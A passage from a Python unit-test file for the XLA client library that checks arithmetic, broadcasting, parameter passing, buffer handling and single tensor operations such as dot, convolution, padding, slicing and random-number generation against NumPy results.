c.Mul( c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])), c.Constant(NumpyArrayF32([-1.2, 2, -2, -3]))) self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1]) def testConstantVectorMulF64(self): c = self._NewComputation() c.Mul( c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])), c.Constant(NumpyArrayF64([-1.2, 2, -2, -3]))) self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1]) def testConstantVectorScalarDivF32(self): c = self._NewComputation() c.Div( c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])), c.ConstantF32Scalar(2.0)) self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4]) def testConstantVectorScalarDivF64(self): c = self._NewComputation() c.Div( c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])), c.ConstantF64Scalar(2.0)) self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4]) def testConstantVectorScalarPowF32(self): c = self._NewComputation() c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.)) self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.]) def testConstantVectorScalarPowF64(self): c = self._NewComputation() c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.)) self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.]) def testBooleanAnd(self): c = self._NewComputation() c.And( c.Constant(NumpyArrayBool([True, False, True, False])), c.Constant(NumpyArrayBool([True, True, False, False]))) self._ExecuteAndCompareExact(c, expected=[True, False, False, False]) def testBooleanOr(self): c = self._NewComputation() c.Or( c.Constant(NumpyArrayBool([True, False, True, False])), c.Constant(NumpyArrayBool([True, True, False, False]))) self._ExecuteAndCompareExact(c, expected=[True, True, True, False]) def testSum2DF32(self): c = self._NewComputation() c.Add( c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])), c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]]))) self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]]) def testSum2DF64(self): c = self._NewComputation() c.Add( c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])), c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]]))) self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]]) def testSum2DWith1DBroadcastDim0F32(self): # sum of a 2D array with a 1D array where the latter is replicated across # dimension 0 to match the former's shape. c = self._NewComputation() c.Add( c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayF32([10, 20, 30])), broadcast_dimensions=(0,)) self._ExecuteAndCompareClose( c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]]) def testSum2DWith1DBroadcastDim0F64(self): # sum of a 2D array with a 1D array where the latter is replicated across # dimension 0 to match the former's shape. c = self._NewComputation() c.Add( c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayF64([10, 20, 30])), broadcast_dimensions=(0,)) self._ExecuteAndCompareClose( c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]]) def testSum2DWith1DBroadcastDim1F32(self): # sum of a 2D array with a 1D array where the latter is replicated across # dimension 1 to match the former's shape. c = self._NewComputation() c.Add( c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayF32([10, 20, 30])), broadcast_dimensions=(1,)) self._ExecuteAndCompareClose( c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]]) def testSum2DWith1DBroadcastDim1F64(self): # sum of a 2D array with a 1D array where the latter is replicated across # dimension 1 to match the former's shape. c = self._NewComputation() c.Add( c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayF64([10, 20, 30])), broadcast_dimensions=(1,)) self._ExecuteAndCompareClose( c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]]) def testConstantAxpyF32(self): c = self._NewComputation() c.Add( c.Mul( c.ConstantF32Scalar(2), c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))), c.Constant(NumpyArrayF32([100, -100, 200, -200]))) self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189]) def testConstantAxpyF64(self): c = self._NewComputation() c.Add( c.Mul( c.ConstantF64Scalar(2), c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))), c.Constant(NumpyArrayF64([100, -100, 200, -200]))) self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189]) class ParametersTest(LocalComputationTest): """Tests focusing on Parameter ops and argument-passing.""" def setUp(self): self.f32_scalar_2 = NumpyArrayF32(2.0) self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3]) self.f64_scalar_2 = NumpyArrayF64(2.0) self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3]) self.s32_scalar_3 = NumpyArrayS32(3) self.s32_4vector = NumpyArrayS32([10, 15, -2, 7]) self.s64_scalar_3 = NumpyArrayS64(3) self.s64_4vector = NumpyArrayS64([10, 15, -2, 7]) def testScalarTimesVectorAutonumberF32(self): c = self._NewComputation() p0 = c.ParameterFromNumpy(self.f32_scalar_2) p1 = c.ParameterFromNumpy(self.f32_4vector) c.Mul(p0, p1) self._ExecuteAndCompareClose( c, arguments=[self.f32_scalar_2, self.f32_4vector], expected=[-4.6, 6.6, -8.6, 10.6]) def testScalarTimesVectorAutonumberF64(self): c = self._NewComputation() p0 = c.ParameterFromNumpy(self.f64_scalar_2) p1 = c.ParameterFromNumpy(self.f64_4vector) c.Mul(p0, p1) self._ExecuteAndCompareClose( c, arguments=[self.f64_scalar_2, self.f64_4vector], expected=[-4.6, 6.6, -8.6, 10.6]) def testScalarTimesVectorS32(self): c = self._NewComputation() p0 = c.ParameterFromNumpy(self.s32_scalar_3) p1 = c.ParameterFromNumpy(self.s32_4vector) c.Mul(p0, p1) self._ExecuteAndCompareExact( c, arguments=[self.s32_scalar_3, self.s32_4vector], expected=[30, 45, -6, 21]) def testScalarTimesVectorS64(self): c = self._NewComputation() p0 = c.ParameterFromNumpy(self.s64_scalar_3) p1 = c.ParameterFromNumpy(self.s64_4vector) c.Mul(p0, p1) self._ExecuteAndCompareExact( c, arguments=[self.s64_scalar_3, self.s64_4vector], expected=[30, 45, -6, 21]) def testScalarMinusVectorExplicitNumberingF32(self): # Use explicit numbering and pass parameter_num first. Sub is used since # it's not commutative and can help catch parameter reversal within the # computation. c = self._NewComputation() p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1) p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0) c.Sub(p1, p0) self._ExecuteAndCompareClose( c, arguments=[self.f32_scalar_2, self.f32_4vector], expected=[-4.3, 1.3, -6.3, 3.3]) def testScalarMinusVectorExplicitNumberingF64(self): # Use explicit numbering and pass parameter_num first. Sub is used since # it's not commutative and can help catch parameter reversal within the # computation. c = self._NewComputation() p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1) p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0) c.Sub(p1, p0) self._ExecuteAndCompareClose( c, arguments=[self.f64_scalar_2, self.f64_4vector], expected=[-4.3, 1.3, -6.3, 3.3]) class LocalBufferTest(LocalComputationTest): """Tests focusing on execution with LocalBuffers.""" def _Execute(self, c, arguments): compiled_c = c.Build().CompileWithExampleArguments(arguments) arg_buffers = [xla_client.LocalBuffer.from_py(arg) for arg in arguments] result_buffer = compiled_c.ExecuteWithLocalBuffers(arg_buffers) return result_buffer.to_py() def testConstantSum(self): c = self._NewComputation() c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14)) self._ExecuteAndCompareClose(c, expected=4.25) def testOneParameterSum(self): c = self._NewComputation() c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14)) self._ExecuteAndCompareClose( c, arguments=[NumpyArrayF32(1.11)], expected=4.25) def testTwoParameterSum(self): c = self._NewComputation() c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ParameterFromNumpy(NumpyArrayF32(0.))) self._ExecuteAndCompareClose( c, arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)], expected=4.25) def testCannotCallWithDeletedBuffers(self): c = self._NewComputation() c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14)) arg = NumpyArrayF32(1.11) compiled_c = c.Build().CompileWithExampleArguments([arg]) arg_buffer = xla_client.LocalBuffer.from_py(arg) arg_buffer.delete() with self.assertRaises(ValueError): compiled_c.ExecuteWithLocalBuffers([arg_buffer]) class SingleOpTest(LocalComputationTest): """Tests for single ops. The goal here is smoke testing - to exercise the most basic functionality of single XLA ops. As minimal as possible number of additional ops are added around the op being tested. """ def testConcatenateF32(self): c = self._NewComputation() c.Concatenate( (c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])), c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))), dimension=0) self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0]) def testConcatenateF64(self): c = self._NewComputation() c.Concatenate( (c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])), c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))), dimension=0) self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0]) def testConvertElementType(self): xla_types = { np.bool: xla_client.xla_data_pb2.PRED, np.int32: xla_client.xla_data_pb2.S32, np.int64: xla_client.xla_data_pb2.S64, np.float32: xla_client.xla_data_pb2.F32, np.float64: xla_client.xla_data_pb2.F64, } def _ConvertAndTest(template, src_dtype, dst_dtype): c = self._NewComputation() x = c.Constant(np.array(template, dtype=src_dtype)) c.ConvertElementType(x, xla_types[dst_dtype]) result = c.Build().Compile().Execute() expected = np.array(template, dtype=dst_dtype) self.assertEqual(result.shape, expected.shape) self.assertEqual(result.dtype, expected.dtype) np.testing.assert_equal(result, expected) x = [0, 1, 0, 0, 1] for src_dtype, dst_dtype in itertools.product(xla_types, xla_types): _ConvertAndTest(x, src_dtype, dst_dtype) def testCrossReplicaSumOneReplica(self): samples = [ NumpyArrayF32(42.0), NumpyArrayF32([97.0]), NumpyArrayF32([64.0, 117.0]), NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]), ] for lhs in samples: c = self._NewComputation() c.CrossReplicaSum(c.Constant(lhs)) self._ExecuteAndCompareExact(c, expected=lhs) def testDotMatrixVectorF32(self): c = self._NewComputation() lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]) rhs = NumpyArrayF32([[10.0], [20.0]]) c.Dot(c.Constant(lhs), c.Constant(rhs)) self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs)) def testDotMatrixVectorF64(self): c = self._NewComputation() lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]]) rhs = NumpyArrayF64([[10.0], [20.0]]) c.Dot(c.Constant(lhs), c.Constant(rhs)) self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs)) def testDotMatrixMatrixF32(self): c = self._NewComputation() lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]) rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]]) c.Dot(c.Constant(lhs), c.Constant(rhs)) self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs)) def testDotMatrixMatrixF64(self): c = self._NewComputation() lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]]) rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]]) c.Dot(c.Constant(lhs), c.Constant(rhs)) self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs)) def testDotGeneral(self): c = self._NewComputation() rng = np.random.RandomState(0) lhs = NumpyArrayF32(rng.randn(10, 3, 4)) rhs = NumpyArrayF32(rng.randn(10, 4, 5)) dimension_numbers = (([2], [1]), ([0], [0])) c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers) self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs)) def testDotGeneralWithDotDimensionNumbersProto(self): c = self._NewComputation() rng = np.random.RandomState(0) lhs = NumpyArrayF32(rng.randn(10, 3, 4)) rhs = NumpyArrayF32(rng.randn(10, 4, 5)) dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers() dimension_numbers.lhs_contracting_dimensions.append(2) dimension_numbers.rhs_contracting_dimensions.append(1) dimension_numbers.lhs_batch_dimensions.append(0) dimension_numbers.rhs_batch_dimensions.append(0) c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers) self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs)) def testConvF32Same(self): c = self._NewComputation() a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32") lhs = a(1, 2, 3, 4) rhs = a(1, 2, 1, 2) * 10 c.Conv(c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME) result = np.array([[[[640., 700., 760., 300.], [880., 940., 1000., 380.], [1120., 1180., 1240., 460.]]]]) self._ExecuteAndCompareClose(c, expected=result) def testConvF32Valid(self): c = self._NewComputation() a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32") lhs = a(1, 2, 3, 4) rhs = a(1, 2, 1, 2) * 10 c.Conv(c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID) result = np.array([[[[640., 700., 760.], [1120., 1180., 1240.]]]]) self._ExecuteAndCompareClose(c, expected=result) def testConvWithGeneralPaddingF32(self): c = self._NewComputation() a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32") lhs = a(1, 1, 2, 3) rhs = a(1, 1, 1, 2) * 10 strides = [1, 1] pads = [(1, 0), (0, 1)] lhs_dilation = (2, 1) rhs_dilation = (1, 1) c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation, rhs_dilation) result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.], [40., 50., 0.]]]]) self._ExecuteAndCompareClose(c, expected=result) def testBooleanNot(self): c = self._NewComputation() arr = NumpyArrayBool([True, False, True]) c.Not(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=~arr) def testExp(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Exp(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.exp(arr)) def testRound(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Round(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.round(arr)) def testLog(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Log(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.log(arr)) def testNeg(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Neg(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=-arr) def testFloor(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Floor(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.floor(arr)) def testCeil(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Ceil(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.ceil(arr)) def testAbs(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.]) c.Abs(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.abs(arr)) def testTanh(self): c = self._NewComputation() arr = NumpyArrayF32([3.3, 12.1]) c.Tanh(c.Constant(arr)) self._ExecuteAndCompareClose(c, expected=np.tanh(arr)) def testTrans(self): def _TransposeAndTest(array): c = self._NewComputation() c.Trans(c.Constant(array)) self._ExecuteAndCompareClose(c, expected=array.T) # Test square and non-square matrices in both default (C) and F orders. for array_fun in [NumpyArrayF32, NumpyArrayF64]: _TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]])) _TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F")) _TransposeAndTest(array_fun([[1, 2], [4, 5]])) _TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F")) def testTranspose(self): def _TransposeAndTest(array, permutation): c = self._NewComputation() c.Transpose(c.Constant(array), permutation) expected = np.transpose(array, permutation) self._ExecuteAndCompareClose(c, expected=expected) _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1]) _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0]) _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1]) _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0]) arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32) for permutation in itertools.permutations(range(arr.ndim)): _TransposeAndTest(arr, permutation) _TransposeAndTest(np.asfortranarray(arr), permutation) def testEq(self): c = self._NewComputation() c.Eq( c.Constant(NumpyArrayS32([1, 2, 3, 4])), c.Constant(NumpyArrayS32([4, 2, 3, 1]))) self._ExecuteAndCompareExact(c, expected=[False, True, True, False]) def testNe(self): c = self._NewComputation() c.Ne( c.Constant(NumpyArrayS32([1, 2, 3, 4])), c.Constant(NumpyArrayS32([4, 2, 3, 1]))) self._ExecuteAndCompareExact(c, expected=[True, False, False, True]) c.Ne( c.Constant(NumpyArrayF32([-2.0, 0.0, float("nan"), float("nan")])), c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")]))) self._ExecuteAndAssertWith( np.testing.assert_allclose, c, (), expected=[True, False, True, True]) def testGt(self): c = self._NewComputation() c.Gt( c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])), c.Constant(NumpyArrayS32([1, 0, 2, 7, 12]))) self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False]) def testGe(self): c = self._NewComputation() c.Ge( c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])), c.Constant(NumpyArrayS32([1, 0, 2, 7, 12]))) self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False]) def testLt(self): c = self._NewComputation() c.Lt( c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])), c.Constant(NumpyArrayS32([1, 0, 2, 7, 12]))) self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True]) def testLe(self): c = self._NewComputation() c.Le( c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])), c.Constant(NumpyArrayS32([1, 0, 2, 7, 12]))) self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True]) def testMax(self): c = self._NewComputation() c.Max( c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])), c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0]))) self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0]) def testMaxExplicitBroadcastDim0(self): c = self._NewComputation() c.Max( c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayF32([3, 4, 5])), broadcast_dimensions=(0,)) self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]]) def testMaxExplicitBroadcastDim1(self): c = self._NewComputation() c.Max( c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayF32([3, 4, 5])), broadcast_dimensions=(1,)) self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]]) def testMin(self): c = self._NewComputation() c.Min( c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])), c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0]))) self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0]) def testPad(self): c = self._NewComputation() c.Pad( c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])), c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)]) self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0], [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]) def testPadWithPaddingConfig(self): c = self._NewComputation() padding_config = xla_client.xla_data_pb2.PaddingConfig() for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]: dimension = padding_config.dimensions.add() dimension.edge_padding_low = lo dimension.edge_padding_high = hi dimension.interior_padding = interior c.Pad( c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])), c.Constant(NumpyArrayF32(0.0)), padding_config) self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0], [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]) def testReshape(self): c = self._NewComputation() c.Reshape( c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])), dimensions=[0, 1], new_sizes=[2, 3]) self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]]) def testCollapse(self): c = self._NewComputation() c.Collapse( c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])), dimensions=[1, 2]) self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]]) def testRev(self): c = self._NewComputation() c.Rev( c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])), dimensions=[0, 2]) self._ExecuteAndCompareExact( c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]) def testClampF32(self): c = self._NewComputation() c.Clamp( c.Constant(NumpyArrayF32(-1)), c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])), c.Constant(NumpyArrayF32(2))) self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2]) # TODO(b/72689392): re-enable when bug S32 resolved def DISABLED_testClampS32(self): c = self._NewComputation() c.Clamp( c.Constant(NumpyArrayS32(-1)), c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])), c.Constant(NumpyArrayS32(2))) self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2]) def testSelect(self): c = self._NewComputation() c.Select( c.Constant(NumpyArrayBool([True, False, False, True, False])), c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])), c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5]))) self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5]) def testSlice(self): c = self._NewComputation() c.Slice( c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0], [3, 2]) self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]]) def testDynamicSlice(self): c = self._NewComputation() c.DynamicSlice( c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayS32([1, 0])), [2, 2]) self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]]) def testDynamicUpdateSlice(self): c = self._NewComputation() c.DynamicUpdateSlice( c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), c.Constant(NumpyArrayS32([[1, 2], [3, 4]])), c.Constant(NumpyArrayS32([1, 1]))) self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]]) def testTuple(self): c = self._NewComputation() c.Tuple( c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])), c.Constant(NumpyArrayBool([True, False, False, True]))) result = c.Build().Compile().Execute() self.assertIsInstance(result, tuple) np.testing.assert_equal(result[0], 42) np.testing.assert_allclose(result[1], [1.0, 2.0]) np.testing.assert_equal(result[2], [True, False, False, True]) def testGetTupleElement(self): c = self._NewComputation() c.GetTupleElement( c.Tuple( c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])), c.Constant(NumpyArrayBool([True, False, False, True]))), 1) self._ExecuteAndCompareClose(c, expected=[1.0, 2.0]) def testBroadcast(self): c = self._NewComputation() c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,)) self._ExecuteAndCompareExact( c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]) def testRngNormal(self): shape = (2, 3) c = self._NewComputation() c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)), dims=shape) result = c.Build().Compile().Execute() # since the result is random, we just check shape and uniqueness self.assertEqual(result.shape, shape) self.assertEqual(len(np.unique(result)), np.prod(shape)) def testRngUniformF32(self): lo, hi = 2., 4. shape = (2, 3) c = self._NewComputation() c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)), dims=shape) result = c.Build().Compile().Execute() # since the result is random, we just check shape, uniqueness, and range self.assertEqual(result.shape, shape) self.assertEqual(len(np.unique(result)), np.prod(shape)) self.assertTrue(np.all(lo <= result)) self.assertTrue(np.all(result < hi)) def testRngUniformS32(self): lo, hi = 2, 4 shape = (2, 3) c = self._NewComputation() c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)), dims=shape) result = c.Build().Compile().Execute() # since the result is random, we just check shape, integrality, and range self.assertEqual(result.shape, shape) self.assertEqual(result.dtype, np.int32) self.assertTrue(np.all(lo <= result)) self.assertTrue(np.all(result < hi)) class EmbeddedComputationsTest(LocalComputationTest): """Tests for XLA graphs with embedded computations (such as maps).""" def _CreateConstantS32Computation(self): """Computation (f32) -> s32 that returns a constant 1 for any input.""" c = self._NewComputation("constant_s32_one") # TODO(eliben): consider adding a nicer way to create new parameters without # having to create dummy Numpy arrays or populating Shape messages. Perhaps # we need our own (Python-client-own) way to represent Shapes conveniently. c.ParameterFromNumpy(NumpyArrayF32(0)) c.ConstantS32Scalar(1) return c.Build() def _CreateConstantS64Computation(self): """Computation (f64) -> s64 that returns a constant 1 for any input.""" c = self._NewComputation("constant_s64_one") # TODO(eliben): consider adding a nicer way to create new parameters without # having to create dummy Numpy arrays or populating Shape messages. Perhaps # we need our own (Python-client-own) way to represent Shapes conveniently. c.ParameterFromNumpy(NumpyArrayF64(0)) c.ConstantS64Scalar(1) return c.Build() def _CreateConstantF32Computation(self): """Computation (f32) -> f32 that returns a constant 1.0 for any input.""" c = self._NewComputation("constant_f32_one") c.ParameterFromNumpy(NumpyArrayF32(0)) c.ConstantF32Scalar(1.0) return c.Build() def _CreateConstantF64Computation(self): """Computation (f64) -> f64 that returns a constant 1.0 for any input.""" c = self._NewComputation("constant_f64_one") c.ParameterFromNumpy(NumpyArrayF64(0)) c.ConstantF64Scalar(1.0) return c.Build() def _CreateMulF32By2Computation(self): """Computation (f32) -> f32 that multiplies its parameter by 2.""" c = self._NewComputation("mul_f32_by2") c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0)) return c.Build() def _CreateMulF64By2Computation(self): """Computation (f64) -> f64 that multiplies its parameter by 2.""" c = self._NewComputation("mul_f64_by2") c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0)) return c.Build() def _CreateBinaryAddF32Computation(self): """Computation (f32, f32) -> f32 that adds its two parameters.""" c = self._NewComputation("add_param0_by_param1") c.Add( c.ParameterFromNumpy(NumpyArrayF32(0)), c.ParameterFromNumpy(NumpyArrayF32(0))) return c.Build() def _CreateBinaryAddF64Computation(self): """Computation (f64, f64) -> f64 that adds its two parameters.""" c = self._NewComputation("add_param0_by_param1") c.Add( c.ParameterFromNumpy(NumpyArrayF64(0)), c.ParameterFromNumpy(NumpyArrayF64(0))) return c.Build() def _CreateBinaryDivF32Computation(self): """Computation (f32, f32) -> f32 that divides its two parameters.""" c = self._NewComputation("div_param0_by_param1") c.Div( c.ParameterFromNumpy(NumpyArrayF32(0)), c.ParameterFromNumpy(NumpyArrayF32(0))) return c.Build() def _CreateBinaryDivF64Computation(self): """Computation (f64, f64) -> f64 that divides its two parameters.""" c = self._NewComputation("div_param0_by_param1") c.Div( c.ParameterFromNumpy(NumpyArrayF64(0)), c.ParameterFromNumpy(NumpyArrayF64(0))) return c.Build() def _CreateTestF32Lt10Computation(self): """Computation (f32) -> bool that tests if its parameter is less than 10.""" c = self._NewComputation("test_f32_lt_10") c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.)) return c.Build() def _CreateTestF64Lt10Computation(self): """Computation (f64) -> bool that tests if its parameter is less than 10.""" c = self._NewComputation("test_f64_lt_10") c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.)) return c.Build() def _CreateBinaryGeF32Computation(self): """Computation (f32, f32) -> bool that tests first_param >= second_param.""" c = self._NewComputation("param0_lt_param1") c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ParameterFromNumpy(NumpyArrayF32(0))) return c.Build() def _CreateBinaryGeF64Computation(self): """Computation (f64, f64) -> bool that tests first_param >= second_param.""" c = self._NewComputation("param0_lt_param1") c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ParameterFromNumpy(NumpyArrayF64(0))) return c.Build() def _MakeSample3DArrayF32(self): return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]]) def _MakeSample3DArrayF64(self): return 